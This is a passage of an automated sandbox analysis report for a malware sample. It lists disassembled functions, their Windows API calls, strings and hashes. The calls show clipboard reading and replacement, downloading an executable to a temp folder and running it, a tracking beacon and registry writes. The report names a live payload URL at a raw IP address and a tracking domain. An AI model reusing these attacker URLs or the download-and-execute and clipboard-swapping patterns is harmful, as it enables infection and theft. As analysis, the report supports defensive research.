Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

.exe, xrefs: 00402A6B
ShareScreen, xrefs: 00402A12
<, xrefs: 00402B45

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 009EA48E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009EA4B6
Module32First.KERNEL32(00000000,00000224), ref: 009EA4D6

Memory Dump Source

Source File: 00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e9000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: bdd6f83e162f2c8ea0573561ec6d9c76732242f89c25af634a882950f132e872
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: F1F0F6312007506BE7213BFA9C8DB6E72ECAF49324F100128F646914E0EBB4FC454A62

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D

Strings

cess, xrefs: 0247018D
kernel32.dll, xrefs: 0247008F, 02470095

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
ShareScreen, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

